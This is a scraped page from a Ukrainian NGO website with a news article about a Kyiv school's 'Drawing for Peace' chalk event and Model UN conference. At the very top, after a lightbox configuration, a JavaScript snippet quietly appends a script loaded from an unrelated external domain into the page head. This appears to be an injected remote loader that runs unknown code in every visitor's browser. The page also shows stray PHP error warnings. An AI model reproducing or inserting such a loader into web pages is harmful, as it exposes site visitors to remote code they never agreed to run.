, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

МАЛЮЄМО ЗАРАДИ МИРУ!

МАЛЮЄМО ЗАРАДИ МИРУ!

Пропозицію про співпрацю і новий проект «Малюємо заради миру», запропонований МГО «МОЗІРОН» було з радістю прийнято у Скандинавській гімназії міста Києва.

Світлана Винограденко, голова правління МГО «МОЗІРОН» нещодавно відвідала Скандинавську гімназію в Києві. Побувала на прес-конференції й одразу приступила до конкретної роботи. Їй, багатодітній матері, не байдужі питання захисту прав дитини. Вона швидко знайшла спільну мову з такими ж активістками й керівниками груп проектів: Наталією Володимирівною Мельник і Єлизаветою Антонівною Глотовою. Найближчу акцію «Малюємо заради миру» вирішили провести у День захисту прав дітей.

– У вересні 2016 року у Скандинавській гімназії, що у Дарницькому районі столиці відбудеться ІІ науково-практична конференція «Модель ООН: Сканді-Юніор 2016». Темою цьогорічного заходу є «Роль ООН у збереженні економічних, політичних, політичних та соціальних інтересів світової спільноти», – розповідає Наталія Мельник.

І тут же Наталія Володимирівна додає, що у школі є людина, яка всім серцем прикипіла до цього проекту – це вчителька історії Єлизавета Антонівна Глотова.

– Модель Організації Об’єднаних Націй – це гра, що імітує засідання різних органів системи ООН, а її учасники виступають у ролі дипломатів, – пояснює Єлизавета Антонівна. «Модель ООН: Сканді-Юніор» спрямована на розширення світогляду учнів, формування комунікативних, політичних, соціальних та лідерських компетенцій.

Наталія Володимирівна Мельник, заступник директора з виховної роботи Скандинавської гімназії оголошує проект «Малюємо заради миру» відкритим! Команди обрали собі зручні місця на пішохідному тротуарі. Для всіх визначений час – одна година п’ятнадцять хвилин.

– Головне – я бажаю вам не перемоги, а творчості, – звертається до дітей Наталія Володимирівна. – Малюйте, отримуйте задоволення!

Не було б такого руху в гімназії, аби не Єлизавета Антонівна Глотова, керівник євроклубу «Вікінги». Саме вона є невгамовним основоположником цієї моделі. В гімназії вже працює сорок команд, які виходять на міжнародний рівень.

…А тим часом команди працюють. Участь у проекті беруть учні 6-7-8 класів під керівництвом старшої групи вікінгів, керівників груп. За роботою стежить Андрій Круть, Президент «Моделі ООН: сканді-юніор 2016».

– Сьогодні ми маємо добру можливість висловити свої думки через малюнки, – говорить Андрій.

Його підтримує й доповнює Олександра Оснач, голова прес-центру гімназії.

На асфальті народжуються малюнки.

– Символом миру вважається голубка з оливковою гілочкою, – пояснюють у першій групі, яка найменувала себе «Діти миру».

Далі – поле маків… Це символ тих, хто поліг за наше сьогодення, – захищаючи свою роботу, – пояснюють художники. Вони нагадують, що на Сході тривають бойові дії… Але ж у мріях – Україна, яка розквітне! Тому на малюнку велике дерево з міцним корінням.

Діти не просто малюють. Вони захищають свої малюнки розповідями, доповнюють історичними фактами, читають власні вірші…

Дорослі, – схаменіться! Хай завжди буде сонце, небо! Звучить пісня «Хай завжди буде сонце!» Щасливі долоньки підносять до сонця земну кулю. Хай буде мир! Хай будуть в обіймах діти всіх народів!

Діти не поспішають розходитися. Вони самостійно підводять підсумки, голосують за роботи кожної команди.

– Це справжнє свято, – стверджує директор Скандинавської гімназії Тетяна Едуардівна Пушкарьова. – Я впевнена, що ви давно не брали до рук крейду, але все так чудово вийшло. Ви отримали задоволення. Цю добру традицію започаткуємо і наступного року навіть створимо групу з учителів! Ось тільки потренуємося! Отож, долучайтеся до великої гри!

І все ж – як без переможців і призів?!  Грамоти знайшли переможців. А приємні подарунки від українського виробника “Свято світ” люб’язно надав волонтер МГО “МОЗІРОН” Ігор Бібік.
…Моє найбільше бажання: аби дощ не змив ще довго ці малюнки…Аби дорослі обережніше ступали, дивилися під ноги і….ЛЮБИЛИ ДІТЕЙ!

Людмила ЧЕЧЕЛЬ

Від автора. Будемо раді і вдячні, кожному, хто поділиться своїми враженнями, думками, пропозиціями.

 

Добавить комментарий

Почта (не публикуется) Обязательные поля помечены *

*

Captcha Captcha Reload

Вы можете использовать эти HTML теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Вы можете добавить изображение к Вашему отзыву нажав здесь.

TRANSLATE

Russian to English Russian to German Russian to French Russian to Spanish Russian to Italian Russian to Japanese Russian to Chinese

Новости и События

Отзывы

 • Детская спортиная школа "Колос"

  Шановна Світлана Володимірівна! [img]http://moziron.org/wp-content/uploads/2016/12/viber-image_1.jpg[/img]
  Читать полностью...
  Оставлен 23 Дек 2016
 • Білоколодязький НВК

  Шановна Світлано Володимирівно! Вісловлюю вам щиру подяку за активну громадську позицію , вагомий внесок...
  Читать полностью...
  Оставлен 15 Дек 2016

ФОТОГАЛЕРЕЯ


Warning: array_merge() [function.array-merge]: Argument #1 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Видео

 

Наши партнеры

Бориспільський дошкільний навчальний заклад (ясла-садок) комбінованого типу №2